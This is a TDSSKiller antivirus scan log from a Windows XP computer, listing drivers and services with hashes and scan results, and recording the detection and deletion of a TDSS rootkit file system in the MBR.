13:16:15.0406 0x08d8  [ A081CB6FB9A12668F233EB5414BE3A0E, EE2A1311B51D1FEBAF79F45E568A927D8EA7704AFC8495AED2D26927566F61E3 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
13:16:15.0421 0x08d8  Net Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
13:16:18.0171 0x08d8  Detect skipped due to KSN trusted
13:16:18.0171 0x08d8  Net Driver HPZ12 - ok
13:16:18.0203 0x08d8  [ 5D81CF9A2F1A3A756B66CF684911CDF0, 7989C36607CAEA17AFA2C1C9904145CA0714A54B9F712D9D4C1AB140D0B2CC0C ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys
13:16:18.0406 0x08d8  NetBIOS - ok
13:16:18.0453 0x08d8  [ 74B2B2F5BEA5E9A3DC021D685551BD3D, 7932B71F98B4122BE88F576BF6D745A757AE378A48924B7F4358837B75640A82 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
13:16:18.0593 0x08d8  NetBT - ok
13:16:18.0640 0x08d8  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDE          C:\WINDOWS\system32\netdde.exe
13:16:18.0781 0x08d8  NetDDE - ok
13:16:18.0796 0x08d8  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDEdsdm      C:\WINDOWS\system32\netdde.exe
13:16:18.0921 0x08d8  NetDDEdsdm - ok
13:16:18.0953 0x08d8  [ A4ABB21D13528D1BA3ABF484B2DF24FE, 2DC5CFB023D990FD5680859660108EA80FB320A882C5B4BBAA3A061D7C870F46 ] netfilter       C:\WINDOWS\system32\drivers\netfilter.sys
13:16:18.0968 0x08d8  netfilter - detected UnsignedFile.Multi.Generic ( 1 )
13:16:21.0484 0x08d8  Detect skipped due to KSN trusted
13:16:21.0484 0x08d8  netfilter - ok
13:16:21.0515 0x08d8  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] Netlogon        C:\WINDOWS\system32\lsass.exe
13:16:21.0671 0x08d8  Netlogon - ok
13:16:21.0718 0x08d8  [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE, 4E0A67B3CC897E80D4B342FFE8B7B4CC4F6CA2EF2D34C136027A098B2E1C6166 ] Netman          C:\WINDOWS\System32\netman.dll
13:16:21.0875 0x08d8  Netman - ok
13:16:21.0906 0x08d8  [ D34612C5D02D026535B3095D620626AE, 1BBCCCBF49EB8807240A77DCB43C25C21682073CC5356594E2C4F53EF36BF657 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:16:21.0921 0x08d8  NetTcpPortSharing - ok
13:16:21.0968 0x08d8  [ E9E47CFB2D461FA0FC75B7A74C6383EA, 544136F5BFD4DC23D45E90F12FA48B82FD9EAEA9EAF3E0F5F0BD27E23D672C3E ] NIC1394         C:\WINDOWS\system32\DRIVERS\nic1394.sys
13:16:22.0109 0x08d8  NIC1394 - ok
13:16:22.0140 0x08d8  [ 943337D786A56729263071623BBB9DE5, B631B47C869FE4ACF46E4AA272435D9A9CA536E3349E3FFBB8602636FEE7AFD4 ] Nla             C:\WINDOWS\System32\mswsock.dll
13:16:22.0171 0x08d8  Nla - ok
13:16:22.0187 0x08d8  [ 3182D64AE053D6FB034F44B6DEF8034A, 4ADFC76965BA2A5F488E71789A4E4EA702A74AF42725F72130D1CA919406CF19 ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
13:16:22.0328 0x08d8  Npfs - ok
13:16:22.0375 0x08d8  [ 78A08DD6A8D65E697C18E1DB01C5CDCA, E0E6F3ED05068E32F1D5C2D2B38CDEF4536B8656DB6756C66CF6B40B60C8F3DA ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys
13:16:22.0546 0x08d8  Ntfs - ok
13:16:22.0578 0x08d8  [ 7F1C1F78D709C4A54CBB46EDE7E0B48D, 52135D41983A9E9E1DCA250A63017076AE22AA06D77CCF2E5EF41154F958584A ] NTIDrvr         C:\WINDOWS\system32\DRIVERS\NTIDrvr.sys
13:16:22.0593 0x08d8  NTIDrvr - detected UnsignedFile.Multi.Generic ( 1 )
13:16:25.0109 0x08d8  Detect skipped due to KSN trusted
13:16:25.0109 0x08d8  NTIDrvr - ok
13:16:25.0125 0x08d8  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] NtLmSsp         C:\WINDOWS\system32\lsass.exe
13:16:25.0296 0x08d8  NtLmSsp - ok
13:16:25.0343 0x08d8  [ 156F64A3345BD23C600655FB4D10BC08, 9611BE411586E068D9297D77102DB3BE48AA67F1BAD6F61A84F83FC3043FA9CD ] NtmsSvc         C:\WINDOWS\system32\ntmssvc.dll
13:16:25.0500 0x08d8  NtmsSvc - ok
13:16:25.0515 0x08d8  [ 73C1E1F395918BC2C6DD67AF7591A3AD, B21133A75253EC15E2DFF66D3B480AB1A7E1A2360476C810E7AA55D0F0EB08D4 ] Null            C:\WINDOWS\system32\drivers\Null.sys
13:16:25.0640 0x08d8  Null - ok
13:16:25.0656 0x08d8  [ B305F3FAD35083837EF46A0BBCE2FC57, 9D0E0E666D652D0FC9EAB97280A5D67AAF61D6B21929DF7CF8ED72A367720464 ] NwlnkFlt        C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
13:16:25.0796 0x08d8  NwlnkFlt - ok
13:16:25.0812 0x08d8  [ C99B3415198D1AAB7227F2C88FD664B9, DD8DA4B5E804F134AB9233859544C025062902DFC3E8FB8A09A67337A4E73F55 ] NwlnkFwd        C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
13:16:25.0953 0x08d8  NwlnkFwd - ok
13:16:26.0078 0x08d8  [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv          C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
13:16:26.0109 0x08d8  odserv - ok
13:16:26.0140 0x08d8  [ CA33832DF41AFB202EE7AEB05145922F, 9DD0089C2E13C7F81214C3B5A4A61276292052F9BBFEA7FCD0F6AA27815D5F95 ] ohci1394        C:\WINDOWS\system32\DRIVERS\ohci1394.sys
13:16:26.0281 0x08d8  ohci1394 - ok
13:16:26.0312 0x08d8  [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
13:16:26.0328 0x08d8  ose - ok
13:16:26.0359 0x08d8  [ 5575FAF8F97CE5E713D108C2A58D7C7C, 96D4595D19A78CCBE8B325A08780AC077AE5CC99642ACD72FB47AEAE8D344D3B ] Parport         C:\WINDOWS\system32\DRIVERS\parport.sys
13:16:26.0515 0x08d8  Parport - ok
13:16:26.0546 0x08d8  [ BEB3BA25197665D82EC7065B724171C6, 7E71C13BA30CD95CEE8A9CC85E6F48A01F30EDEAADEE69D80AE828BF97E5A5CA ] PartMgr         C:\WINDOWS\system32\drivers\PartMgr.sys
13:16:26.0718 0x08d8  PartMgr - ok
13:16:26.0750 0x08d8  [ 70E98B3FD8E963A6A46A2E6247E0BEA1, 6771313EC41B3B5BFD398F60706E40BE71617046880CC352DD110B001AFC22A1 ] ParVdm          C:\WINDOWS\system32\drivers\ParVdm.sys
13:16:26.0875 0x08d8  ParVdm - ok
13:16:26.0890 0x08d8  [ A219903CCF74233761D92BEF471A07B1, D4E6C360A1D2FCA4D17C991B834D68BF20F5111DD06B1FAB8B22984804CEC269 ] PCI             C:\WINDOWS\system32\DRIVERS\pci.sys
13:16:27.0031 0x08d8  PCI - ok
13:16:27.0062 0x08d8  [ CCF5F451BB1A5A2A522A76E670000FF0, D63F7E5A39653EC9CCE94B7D84B2D3EBD4F54533BD65701020198724042C9257 ] PCIIde          C:\WINDOWS\system32\DRIVERS\pciide.sys
13:16:27.0187 0x08d8  PCIIde - ok
13:16:27.0234 0x08d8  [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1, 0BA3DB21DC7C641C181E2635B5C9B73965FDCDCD3EBBBE48FCFEC1C8C987F617 ] Pcmcia          C:\WINDOWS\system32\drivers\Pcmcia.sys
13:16:27.0375 0x08d8  Pcmcia - ok
13:16:27.0375 0x08d8  perc2 - ok
13:16:27.0390 0x08d8  perc2hib - ok
13:16:27.0421 0x08d8  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] PlugPlay        C:\WINDOWS\system32\services.exe
13:16:27.0437 0x08d8  PlugPlay - ok
13:16:27.0484 0x08d8  [ 65BC271F337637731D3C71455AE1F476, DAD32B61FE0147F8D2DA4C8F016920CD6BB2098F16E3CC2768009763E71DEFBC ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
13:16:56.0015 0x08d8  ================ Scan global ===============================
13:16:56.0046 0x08d8  [ 42F1F4C0AFB08410E5F02D4B13EBB623, 924C30587C51C0D1E1F47991969AF492A644552E15F2480EA991DCB74A3E68D5 ] C:\WINDOWS\system32\basesrv.dll
13:16:56.0093 0x08d8  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:16:56.0125 0x08d8  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:16:56.0140 0x08d8  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] C:\WINDOWS\system32\services.exe
13:16:56.0140 0x08d8  [ Global ] - ok
13:16:56.0156 0x08d8  ================ Scan MBR ==================================
13:16:56.0171 0x08d8  [ 99852D5C3A78447C3D6D82B6155FE848 ] \Device\Harddisk0\DR0
13:16:59.0046 0x08d8  \Device\Harddisk0\DR0 - detected TDSS File System ( 1 )
13:16:59.0046 0x08d8  \Device\Harddisk0\DR0 ( TDSS File System ) - warning
13:17:01.0625 0x08d8  ================ Scan VBR ==================================
13:17:01.0625 0x08d8  [ BA29F0665A0180B8388AD44A01EA69CE ] \Device\Harddisk0\DR0\Partition1
13:17:01.0640 0x08d8  \Device\Harddisk0\DR0\Partition1 - ok
13:17:01.0656 0x08d8  [ EF7C7D20C938BDEB2E5C23C206B5B61F ] \Device\Harddisk0\DR0\Partition2
13:17:01.0656 0x08d8  \Device\Harddisk0\DR0\Partition2 - ok
13:17:01.0656 0x08d8  ================ Scan generic autorun ======================
13:17:28.0796 0x08d8  Waiting for KSN requests completion. In queue: 8
13:17:29.0796 0x08d8  Waiting for KSN requests completion. In queue: 8
13:17:30.0796 0x08d8  Waiting for KSN requests completion. In queue: 8
13:17:32.0062 0x08d8  Win FW state via NFM: disabled
13:17:34.0640 0x08d8  ============================================================
13:17:34.0640 0x08d8  Scan finished
13:17:34.0640 0x08d8  ============================================================
13:17:34.0640 0x0aec  Detected object count: 1
13:17:34.0640 0x0aec  Actual detected object count: 1
13:17:52.0000 0x0aec  \Device\Harddisk0\DR0\TDLFS\config.ini - copied to quarantine
13:17:52.0031 0x0aec  \Device\Harddisk0\DR0\TDLFS\tdl - copied to quarantine
13:17:52.0031 0x0aec  \Device\Harddisk0\DR0\TDLFS\rsrc.dat - copied to quarantine
13:17:52.0046 0x0aec  \Device\Harddisk0\DR0\TDLFS\tdlcmd.dll - copied to quarantine
13:17:52.0046 0x0aec  \Device\Harddisk0\DR0\TDLFS - deleted
13:17:52.0046 0x0aec  \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Delete
13:18:09.0140 0x020c  ============================================================
13:18:09.0140 0x020c  Scan started
13:18:09.0140 0x020c  Mode: Manual; SigCheck; TDLFS;
13:18:09.0140 0x020c  ============================================================
13:18:09.0140 0x020c  KSN ping started
13:18:11.0687 0x020c  KSN ping finished: true
13:18:12.0125 0x020c  ================ Scan system memory ========================
13:18:12.0125 0x020c  System memory - ok
13:18:12.0125 0x020c  ================ Scan services =============================
13:18:13.0796 0x020c  [ B5B8A80875C1DEDEDA8B02765642C32F, AD0C71D73B1B8225351FBF4FFB43001A32B4DAE69504C59970CD2428BB33D4EF ] Arp1394         C:\WINDOWS\system32\DRIVERS\arp1394.sys
13:18:13.0937 0x020c  Arp1394 - ok
13:18:13.0953 0x020c  asc - ok
13:18:13.0953 0x020c  asc3350p - ok
13:18:13.0968 0x020c  asc3550 - ok
13:18:14.0046 0x020c  [ 0E5E4957549056E2BF2C49F4F6B601AD, F7F19FDC906B719A3516D30A9B4A2262C8CC5B36B94E3D4195C345EC4610FF2B ] aspnet_state    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
13:18:14.0062 0x020c  aspnet_state - ok
13:18:14.0078 0x020c  [ B153AFFAC761E7F5FCFA822B9C4E97BC, 7E60F572A6B3C6219E3C86225AA37243AFFD74337DB7F108B04778042E5CC959 ] AsyncMac        C:\WINDOWS\system32\DRIVERS\asyncmac.sys
13:18:14.0250 0x020c  AsyncMac - ok
13:18:14.0296 0x020c  [ 9F3A2F5AA6875C72BF062C712CFA2674, B4DF1D2C56A593C6B54DE57395E3B51D288F547842893B32B0F59228A0CF70B9 ] atapi           C:\WINDOWS\system32\DRIVERS\atapi.sys
13:18:14.0421 0x020c  atapi - ok
13:18:14.0437 0x020c  Atdisk - ok
13:18:14.0453 0x020c  [ 9916C1225104BA14794209CFA8012159, 5D6F05F715C52A16D05CAE15C3DFE77A139A7F27F7AE710EC9A10F9EE05115A1 ] Atmarpc         C:\WINDOWS\system32\DRIVERS\atmarpc.sys
13:18:14.0578 0x020c  Atmarpc - ok
13:18:14.0625 0x020c  [ DEF7A7882BEC100FE0B2CE2549188F9D, 462C95B63D0A1058291A2DC8CBFCB13D7D74CCD1CA43B613A7EB43D49E3276F8 ] AudioSrv        C:\WINDOWS\System32\audiosrv.dll
13:18:14.0750 0x020c  AudioSrv - ok
13:18:14.0781 0x020c  [ D9F724AA26C010A217C97606B160ED68, 329B5118F2409731D06FDAE85B6ADD64A048292801BCB3546651CEB303111695 ] audstub         C:\WINDOWS\system32\DRIVERS\audstub.sys
13:18:14.0921 0x020c  audstub - ok
13:18:14.0984 0x020c  [ A2494901E7226B356B8C1005C45F1C5F, A4A7076D40B012BB415C4B661B8C45671B853330746E278D080EC96596EEECBE ] BBSvc           C:\Program Files\Microsoft\BingBar\7.1.361.0\BBSvc.exe
13:18:15.0015 0x020c  BBSvc - ok
13:18:15.0031 0x020c  [ 63B1CBBAE4790B5BAC98F01BF9449722, 0A49B9FCEF33B38132B0AB8A9D7591A46856E82BC2123841E27A895817D92695 ] BBUpdate        C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.exe
13:18:15.0062 0x020c  BBUpdate - ok
13:18:15.0078 0x020c  [ DA1F27D85E0D1525F6621372E7B685E9, 5A81A46A3BDD19DAFC6C87D277267A5D44F3A1B5302F2CC1111D84B7BAD5610D ] Beep            C:\WINDOWS\system32\drivers\Beep.sys
13:18:15.0218 0x020c  Beep - ok
13:18:15.0265 0x020c  [ 574738F61FCA2935F5265DC4E5691314, 3C7CCF064397186C3A3863DD2370AB6414A61B330097DCA4F299CA7BBAA3D1B4 ] BITS            C:\WINDOWS\system32\qmgr.dll
13:18:15.0437 0x020c  BITS - ok
13:18:15.0500 0x020c  [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A, 10F21999FF6B1D410EBF280F7F27DEACA5289739CF12F4293B614B8FC6C88DCC ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
13:18:15.0531 0x020c  Bonjour Service - ok
13:18:15.0578 0x020c  [ CFD4E51402DA9838B5A04AE680AF54A0, 5378F42B195B5832B00A05AD64E00473A45FFB86AC25C57241F26EA82B149FE1 ] Browser         C:\WINDOWS\System32\browser.dll
13:18:15.0609 0x020c  Browser - ok
13:18:15.0640 0x020c  [ 90A673FC8E12A79AFBED2576F6A7AAF9, BDE7858A3457DB979FEDD8577FA6321BF72848E4A7BF9F173C78A6A10CBB3EBE ] cbidf2k         C:\WINDOWS\system32\drivers\cbidf2k.sys
13:18:15.0812 0x020c  cbidf2k - ok
13:18:15.0812 0x020c  cd20xrnt - ok
13:18:15.0828 0x020c  [ C1B486A7658353D33A10CC15211A873B, AA4DD9E7AAE5AAB1146B360B17001F975D2F29A1281CF7B13E7136480410F347 ] Cdaudio         C:\WINDOWS\system32\drivers\Cdaudio.sys
13:18:15.0968 0x020c  Cdaudio - ok
13:18:15.0984 0x020c  [ C885B02847F5D2FD45A24E219ED93B32, B26B2F8E3A831E2B65EB0C5195B0645CD50E22615CE79C9B0B391CD563B121DB ] Cdfs            C:\WINDOWS\system32\drivers\Cdfs.sys
13:18:16.0125 0x020c  Cdfs - ok
13:18:16.0140 0x020c  [ 1F4260CC5B42272D71F79E570A27A4FE, B51C2A3ED3C309953D0EA45869C8E464C10F2533DADE9E0286AF674979098D1D ] Cdrom           C:\WINDOWS\system32\DRIVERS\cdrom.sys
13:18:16.0281 0x020c  Cdrom - ok
13:18:16.0312 0x020c  [ 1CFE720EB8D93A7158A4EBC3AB178BDE, 65D2A9D9A88F38D4AF323134C151BA0F4B3CD0F6A134AF86E7AC9D07319F1726 ] CiSvc           C:\WINDOWS\system32\cisvc.exe
13:18:16.0453 0x020c  CiSvc - ok
13:18:16.0468 0x020c  [ 34CBE729F38138217F9C80212A2A0C82, A9FD7A758D12E0818A11BEEF1CE772FEFA8373E92EF6C0DA8628CD4572CC9A43 ] ClipSrv         C:\WINDOWS\system32\clipsrv.exe
13:18:16.0609 0x020c  ClipSrv - ok
13:18:16.0656 0x020c  [ D87ACAED61E417BBA546CED5E7E36D9C, 14AC6034A5BC0FB2A1AFDAD42BEF4DE641556E54AD30D0C46765660A4BE55462 ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:18:16.0671 0x020c  clr_optimization_v2.0.50727_32 - ok
13:18:16.0734 0x020c  [ C5A75EB48E2344ABDC162BDA79E16841, 6070A8AAFD38FBC6A68A2B10C20117612354DF21B4492D90CA522BFB6870D726 ] clr_optimization_v4.0.30319_32 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:18:16.0750 0x020c  clr_optimization_v4.0.30319_32 - ok
13:18:16.0750 0x020c  CmdIde - ok
13:18:16.0765 0x020c  COMSysApp - ok
13:18:16.0781 0x020c  Cpqarray - ok
13:18:16.0796 0x020c  [ 3D4E199942E29207970E04315D02AD3B, 0825960894CF9C86CC8775BDD2A262948A09CA495AA7FE9F210FAF49E7086383 ] CryptSvc        C:\WINDOWS\System32\cryptsvc.dll
13:18:16.0953 0x020c  CryptSvc - ok
13:18:16.0953 0x020c  dac2w2k - ok
13:18:16.0968 0x020c  dac960nt - ok
13:18:17.0015 0x020c  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
13:18:17.0046 0x020c  DcomLaunch - ok
13:18:17.0093 0x020c  [ 5E38D7684A49CACFB752B046357E0589, F192AD4190BCFB6939A5CBC91648FE63168AF79A5E227A111DEAD6A92E42AB8D ] Dhcp            C:\WINDOWS\System32\dhcpcsvc.dll
13:18:17.0234 0x020c  Dhcp - ok
13:18:17.0265 0x020c  [ 044452051F3E02E7963599FC8F4F3E25, 584BDDB074618BE76454CF90E74829CFF588B5B5FAEB793E2F7AAD26352DD689 ] Disk            C:\WINDOWS\system32\DRIVERS\disk.sys
13:18:17.0406 0x020c  Disk - ok
13:18:17.0406 0x020c  dmadmin - ok
13:18:17.0453 0x020c  [ D992FE1274BDE0F84AD826ACAE022A41, C82BD6561A14F2932A761F5883A787B99031250EE5E9B7B5714AA045545C9B99 ] dmboot          C:\WINDOWS\system32\drivers\dmboot.sys
13:18:17.0625 0x020c  dmboot - ok
13:18:17.0656 0x020c  [ 7C824CF7BBDE77D95C08005717A95F6F, A73CB323B7A6410C3D3F258BF204E716ADF8C84C9E4F6562C57AB73DAED8CCDE ] dmio            C:\WINDOWS\system32\drivers\dmio.sys
13:18:17.0796 0x020c  dmio - ok
13:18:17.0812 0x020c  [ E9317282A63CA4D188C0DF5E09C6AC5F, D41E002F555FE9015EF620975255F58BB79198CA1FF0E09EC950CB450FF77CF7 ] dmload          C:\WINDOWS\system32\drivers\dmload.sys
13:18:17.0953 0x020c  dmload - ok
13:18:17.0984 0x020c  [ 57EDEC2E5F59F0335E92F35184BC8631, 61F6F0DC2D1A6C61D5EF0D5CC4BE0FFC217F1E61FDA3EA9F704709293656600F ] dmserver        C:\WINDOWS\System32\dmserver.dll
13:18:18.0125 0x020c  dmserver - ok
13:18:18.0140 0x020c  [ 8A208DFCF89792A484E76C40E5F50B45, 4E40E2EB38C6254E7CAA488200E89EE7DEBBBA773890BC6A84313CC68178D54F ] DMusic          C:\WINDOWS\system32\drivers\DMusic.sys
13:18:18.0281 0x020c  DMusic - ok
13:18:18.0312 0x020c  [ 5F7E24FA9EAB896051FFB87F840730D2, 356EEFDCD54DECAD0170B34B993E4BF80DD039E2B2922D7A8D09B84031E9FC7A ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
13:18:18.0328 0x020c  Dnscache - ok
13:18:18.0390 0x020c  [ 0F0F6E687E5E15579EF4DA8DD6945814, 5C32D88119EB1465B2D719BEE2E05888D1A73454B5E33F2D4928DA710F8BFBA3 ] Dot3svc         C:\WINDOWS\System32\dot3svc.dll
13:18:18.0531 0x020c  Dot3svc - ok
13:18:18.0531 0x020c  dpti2o - ok
13:18:18.0578 0x020c  [ 8F5FCFF8E8848AFAC920905FBD9D33C8, C8C6FB97AB0871C8C88A2201525A5CF10D5131CB6980D32692ED7A8F58399AD5 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys
13:18:18.0734 0x020c  drmkaud - ok
13:18:18.0781 0x020c  [ 2187855A7703ADEF0CEF9EE4285182CC, 8233CC11F637866C0074043835A785EA2B616739B6B1181B143A253CF2508CFD ] EapHost         C:\WINDOWS\System32\eapsvc.dll
13:18:18.0953 0x020c  EapHost - ok
13:18:19.0078 0x020c  [ FCE87BA643D5E9A8B6E0378508D1B22D, 45B278A763FB183B2B29AF2D2B9D790BA97A800644942AE4AFBBDCF2864B5AB2 ] eeCtrl          C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys
13:18:19.0109 0x020c  eeCtrl - ok
13:18:19.0156 0x020c  [ BC93B4A066477954555966D77FEC9ECB, 27F5B780175EF46DA102EE33F7F33559C8B40C077EEA4405D579D9507F4B1C23 ] ERSvc           C:\WINDOWS\System32\ersvc.dll
13:18:19.0312 0x020c  ERSvc - ok
13:18:19.0359 0x020c  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] Eventlog        C:\WINDOWS\system32\services.exe
13:18:19.0375 0x020c  Eventlog - ok
13:18:19.0421 0x020c  [ D4991D98F2DB73C60D042F1AEF79EFAE, 58AF949EAEBF4FF3E3314DFB66CE4198BF65F0836B68CD27A6ED319742CCCCD2 ] EventSystem     C:\WINDOWS\system32\es.dll
13:18:19.0437 0x020c  EventSystem - ok
13:18:19.0453 0x020c  [ 38D332A6D56AF32635675F132548343E, E6909DB836AF679B4F4D62C7396D6C82769CC7ABB8C919C2AABFE934FCE268F6 ] Fastfat         C:\WINDOWS\system32\drivers\Fastfat.sys
13:18:19.0609 0x020c  Fastfat - ok
13:18:19.0640 0x020c  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
13:18:19.0671 0x020c  FastUserSwitchingCompatibility - ok
13:18:19.0703 0x020c  [ E97D6A8684466DF94FF3BC24FB787A07, 89E5A6889E3C5AB9AD3E80FFC16DD608278F3ADC282048B40B60196336A5CBEB ] Fax             C:\WINDOWS\system32\fxssvc.exe
13:18:19.0859 0x020c  Fax - ok
13:18:19.0890 0x020c  [ 92CDD60B6730B9F50F6A1A0C1F8CDC81, 8307A532AB4D05CBBCE206DC2759497708BF5AAA880BD00F0E4F281D8578A1F5 ] Fdc             C:\WINDOWS\system32\DRIVERS\fdc.sys
13:18:20.0046 0x020c  Fdc - ok
13:18:20.0078 0x020c  [ D45926117EB9FA946A6AF572FBE1CAA3, 4C94EF009D778BE0BDF8F812F026B96F91F641BE30AA2531427A5E63DBD280DA ] Fips            C:\WINDOWS\system32\drivers\Fips.sys
13:18:20.0203 0x020c  Fips - ok
13:18:20.0218 0x020c  [ 9D27E7B80BFCDF1CDD9B555862D5E7F0, 69C271AD5BCEBFD8AE5A769BDD7EC51256DA3A8ADAD5D12E5C0D13F4E82D8805 ] Flpydisk        C:\WINDOWS\system32\DRIVERS\flpydisk.sys
13:18:20.0359 0x020c  Flpydisk - ok
13:18:20.0375 0x020c  [ B2CF4B0786F8212CB92ED2B50C6DB6B0, 280F5CF8A90F7BEDE73ADD0DD0F8952088133A7CA9A3D3B7041957E33B36845D ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
13:18:20.0531 0x020c  FltMgr - ok
13:18:20.0593 0x020c  [ 8BA7C024070F2B7FDD98ED8A4BA41789, 47585006F86B2C6016EC54250A416794792D1E4024FF229C120BC25B684AF66A ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
13:18:20.0609 0x020c  FontCache3.0.0.0 - ok
13:18:20.0640 0x020c  [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A, EC635E071201A766845D48973772CBE0958942B4162F3F5F70660D114CC877E0 ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
13:18:20.0781 0x020c  Fs_Rec - ok
13:18:20.0812 0x020c  [ 6AC26732762483366C3969C9E4D2259D, FF2C9A23CC17F380093F0BEA955B1925794271C2FEA16B9B7639668E6999BAE3 ] Ftdisk          C:\WINDOWS\system32\DRIVERS\ftdisk.sys
13:18:20.0937 0x020c  Ftdisk - ok
13:18:20.0984 0x020c  [ 185ADA973B5020655CEE342059A86CBB, D3E352DFAF30761505480A4C557D980083F65EC5BD46E2656B2114D47B272A89 ] GEARAspiWDM     C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
13:18:20.0984 0x020c  GEARAspiWDM - ok
13:18:21.0031 0x020c  [ 0A02C63C8B144BD8C86B103DEE7C86A2, 7A3235DD3E1995DD72B212FAEB3ECA2A974434DE9BF6D269EA11BA65A80E7E50 ] Gpc             C:\WINDOWS\system32\DRIVERS\msgpc.sys
13:18:21.0171 0x020c  Gpc - ok
13:18:21.0250 0x020c  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
13:18:21.0265 0x020c  gupdate - ok
13:18:21.0265 0x020c  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
13:18:21.0281 0x020c  gupdatem - ok
13:18:21.0312 0x020c  [ 573C7D0A32852B48F3058CFD8026F511, BC384BBA394AFDCDA1A9ABC858C692AA84A1F0A31AF3DDF7F38D120C027927FB ] HDAudBus        C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
13:18:21.0453 0x020c  HDAudBus - ok
13:18:21.0515 0x020c  [ 4FCCA060DFE0C51A09DD5C3843888BCD, D82417706B517F2610DDF7C86BE03A72EFA9A2A389DF5C8F8ADEAB8144E2C80A ] helpsvc         C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
13:18:21.0656 0x020c  helpsvc - ok
13:18:21.0687 0x020c  [ DEB04DA35CC871B6D309B77E1443C796, F66A15C9528D661940F1F4CA453B3E95036D68C74C3B8AB53644211DBD3D2F32 ] HidServ         C:\WINDOWS\System32\hidserv.dll
13:18:21.0828 0x020c  HidServ - ok
13:18:21.0859 0x020c  [ CCF82C5EC8A7326C3066DE870C06DAF1, 93395FA4C26B2E82DC8B7025ED3BCF583885E5D8C5F60CD6EEAA6335D6A126EC ] hidusb          C:\WINDOWS\system32\DRIVERS\hidusb.sys
13:18:22.0031 0x020c  hidusb - ok
13:18:22.0062 0x020c  [ 8878BD685E490239777BFE51320B88E9, C5C3ECF6B049B6736E35B39518A8F830B45C45A88FFE8E3A6B7922AD946597E2 ] hkmsvc          C:\WINDOWS\System32\kmsvc.dll
13:18:22.0203 0x020c  hkmsvc - ok
13:18:22.0203 0x020c  hpn - ok
13:18:22.0312 0x020c  [ 5DA42D24712E00728CEA2342A65009B2, 73EC5250DCFD556525B24B3CA66C64AC7747E77652A2AD6119936A59A9E8562A ] hpqcxs08        C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
13:18:22.0328 0x020c  hpqcxs08 - ok
